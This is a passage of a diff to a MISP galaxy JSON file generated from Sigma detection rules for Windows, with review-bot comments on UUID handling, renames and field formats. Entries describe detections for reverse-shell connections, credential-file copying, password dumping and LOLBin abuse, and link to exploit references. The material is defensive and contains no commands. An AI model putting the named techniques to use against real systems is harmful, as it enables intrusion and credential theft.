@@ -30987,6 +39356,22 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", "value": "Sofacy Trojan Loader Activity" }, @@ -31027,8 +39412,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" ], "tags": [ @@ -31052,8 +39437,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", + "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" ], "tags": [ 
@@ -31061,6 +39446,15 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36222790-0d43-4fe8-86e4-674b27809543", "value": "DNS Tunnel Technique from MuddyWater" }, @@ -31085,6 +39479,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4281cb20-2994-4580-aa63-c8b86d019934", "value": "Hiding Files with Attrib.exe" }, @@ -31110,6 +39513,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", "value": "Suspicious Registration via cscript.exe" }, @@ -31224,9 +39636,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" ], "tags": [ @@ -31234,6 +39646,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "value": "PsExec/PAExec Escalation to LOCAL SYSTEM" }, 
@@ -31259,33 +39680,18 @@
 "attack.t1059"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e",
 "value": "Sysprep on AppData Folder"
 },
- {
- "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/05/24",
- "falsepositive": [
- "Other tools that work with encoded scripts in the command line instead of script files"
- ],
- "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ]
- },
- "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c",
- "value": "Suspicious PowerShell Encoded Command Patterns"
- },
 {
 "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet",
 "meta": {
@@ -31308,6 +39714,15 @@
 "attack.t1105"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009",
 "value": "Suspicious Desktopimgdownldr Command"
 },
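Review bot: The first hunk deletes the whole "Suspicious PowerShell Encoded Command Patterns" entry (uuid `b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c`) outright rather than retiring it, and this same commit introduces `related` arrays that point at entries by `dest-uuid`, so any cluster or downstream MISP instance already referencing that UUID is left dangling. I would keep the entry and mark it retired in whatever way this galaxy handles deprecated clusters, or at minimum confirm that no `dest-uuid` in this file and no event tag still points to it before the UUID disappears. If the upstream Sigma rule was only renamed or merged, the replacement entry should reuse this UUID instead of minting a new one.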
@@ -31332,6 +39747,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "value": "Wlrmdr Lolbin Use as Launcher" }, @@ -31348,14 +39772,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/SigmaHQ/sigma/issues/3742", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/Hexacorn/status/776122138063409152", "https://twitter.com/gN3mes1s/status/941315826107510784", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" ], "tags": [ 
@@ -31365,16 +39789,32 @@ "attack.t1218.013" ] }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1bae753e-8e52-4055-a66d-2ead90303ca9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", "value": "Rename Mavinject Execution" }, { - "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", "meta": { "author": "FPT.EagleEye, wagga", "creation_date": "2021/03/03", "falsepositive": [ - "Administrative might use this function for checking network connectivity" + "Administrative might use this function to check network connectivity" ], "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", "level": "high", @@ -31382,6 +39822,7 @@ "logsource.product": "windows", "refs": [ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" ], 
@@ -31390,8 +39831,17 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be",
- "value": "Powershell Reverse Shell Connection"
+ "value": "Potential Powershell ReverseShell Connection"
 },
 {
 "description": "Detects using Diskshadow.exe to execute arbitrary code in text file",
@@ -31415,9 +39865,42 @@
 "attack.t1218"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2",
 "value": "Execution via Diskshadow.exe"
 },
+ {
+ "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2023/01/11",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_turn_on_dev_features.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "Internal Research",
+ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "a383dec4-deec-4e6e-913b-ed9249670848",
+ "value": "Potential Signing Bypass Via Windows Developer Features"
+ },
 {
 "description": "Detects netsh commands that configure a port forwarding (PortProxy)",
 "meta": {
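Review bot: The rename `"value": "Potential Powershell ReverseShell Connection"` in the first hunk changes the cluster's display value while keeping uuid `edc2f8ae-2412-4dfd-b9d5-0c57727e70be`; if MISP derives the galaxy tag name from the value, as I recall it does, events tagged with the old name stop resolving to this cluster, so the old name is worth carrying as a `synonyms` entry (the form used by the threat-actor galaxy) or at least calling out in the commit message. In the new `proc_creation_win_turn_on_dev_features.yml` entry in the last hunk, `refs` holds the bare string `"Internal Research"` next to URLs, which looks like the rule's references copied verbatim; a non-link in a field that tooling renders as links is better filtered out or folded into the description by the generator. The same entry's `description` reads `a user enable ... . Which allows`; the fix belongs in the source rule (`a user enables ..., which allows`) so it does not reappear on the next regeneration.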
@@ -31432,9 +39915,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://www.dfirnotes.net/portproxy_detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" ], "tags": [ @@ -31444,6 +39927,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "value": "Netsh Port Forwarding" }, @@ -31470,6 +39962,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", "value": "MSDT Executed with Suspicious Parent" }, @@ -31524,6 +40025,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "value": "Suspicious PowerShell Command Line" }, @@ -31548,6 +40058,15 @@ "attack.t1555.004" ] }, + "related": [ + { + "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "value": "Suspicious Key Manager Access" }, 
@@ -31564,8 +40083,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virusradar.com/en/Win32_Kasidet.AD/description", "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", + "https://www.virusradar.com/en/Win32_Kasidet.AD/description", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml" ], "tags": [ @@ -31573,6 +40092,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "value": "Netsh Program Allowed with Suspcious Location" }, @@ -31589,8 +40117,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1207671369963646976", "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" ], "tags": [ @@ -31604,6 +40132,29 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", "value": "Operation Wocao Activity" }, 
@@ -31629,6 +40180,15 @@ "attack.t1087.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "502b42de-4306-40b4-9596-6f590c81f073", "value": "Local Accounts Discovery" }, @@ -31645,12 +40205,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", - "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", + "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" ], "tags": [ 
@@ -31661,6 +40221,29 @@
 "attack.defense_evasion"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8",
 "value": "New Lolbin Process by Office Applications"
 },
@@ -31677,9 +40260,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/",
 "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml"
 ],
 "tags": [
@@ -31699,6 +40282,71 @@
 "attack.t1218"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "52cad028-0ff0-4854-8f67-d25dfcbc78b4",
 "value": "HTML Help Shell Spawn"
 },
@@ -31754,13 +40402,29 @@
 "attack.s0404"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f",
 "value": "Copying Sensitive Files with Credential Data"
 },
 {
 "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file",
 "meta": {
- "author": "Florian Roth, Nasreddine Bencherchali (updated)",
+ "author": "Florian Roth, Nasreddine Bencherchali",
 "creation_date": "2020/07/03",
 "falsepositive": [
 "Unknown"
@@ -31770,10 +40434,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/",
 "https://twitter.com/max_mal_/status/1542461200797163522",
 "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt",
 "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464",
- "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml"
 ],
 "tags": [
@@ -31781,6 +40445,15 @@
 "attack.t1105"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468",
 "value": "Suspicious Curl Usage on Windows"
 },
@@ -31821,9 +40494,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone",
 "https://ss64.com/nt/dsacls.html",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)",
- "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml"
 ],
 "tags": [
@@ -31831,6 +40504,15 @@
 "attack.t1218"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c",
 "value": "Password Spraying Attempts Using Dsacls"
 },
@@ -31847,9 +40529,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://nvd.nist.gov/vuln/detail/CVE-2021-26084",
 "https://github.com/h3v0x/CVE-2021-26084_Confluence",
 "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
+ "https://nvd.nist.gov/vuln/detail/CVE-2021-26084",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml"
 ],
 "tags": [
@@ -31859,9 +40541,58 @@
 "attack.t1059"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11",
 "value": "Atlassian Confluence CVE-2021-26084"
 },
+ {
+ "description": "Detects potential DLL injection and execution using \"Tracker.exe\"",
+ "meta": {
+ "author": "Avneet Singh @v3t0_, oscd.community",
+ "creation_date": "2020/10/18",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_lolbin_tracker.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1055.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea",
+ "value": "Potential DLL Injection Or Execution Using Tracker.exe"
+ },
 {
 "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc",
 "meta": {
@@ -31884,6 +40615,15 @@
 "attack.t1047"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8",
 "value": "Suspicious WMIC Execution - ProcessCallCreate"
 },
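Review bot: The new Tracker.exe entry stores `creation_date` as `"2020/10/18"`, a slash-separated string that date-aware consumers cannot parse without a custom format. This mirrors the Sigma source field and matches the rest of the file, so it is a point of style rather than a defect, but emitting it as ISO 8601 at generation time (`"creation_date": "2020-10-18"`) would make the field interoperable; the same applies to the Suspicious Encoded PowerShell Command Line entry added later in this patch and, presumably, to every entry the converter writes.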
@@ -31900,9 +40640,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html",
- "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/",
 "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA",
+ "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/",
+ "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml"
 ],
 "tags": [
@@ -31910,6 +40650,15 @@
 "attack.t1003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "2d3cdeec-c0db-45b4-aa86-082f7eb75701",
 "value": "Microsoft IIS Service Account Password Dumped"
 },
@@ -31934,6 +40683,15 @@
 "attack.t1105"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6",
 "value": "Nimgrab File Download"
 },
@@ -31985,6 +40743,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737",
 "value": "Procdump Evasion"
 },
@@ -32002,9 +40769,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://youtu.be/5mqid-7zp8k?t=2481",
- "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/",
 "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
 "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
+ "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml"
 ],
 "tags": [
@@ -32057,6 +40824,15 @@
 "attack.t1588.002"
 ]
 },
+ "related": [
+ {
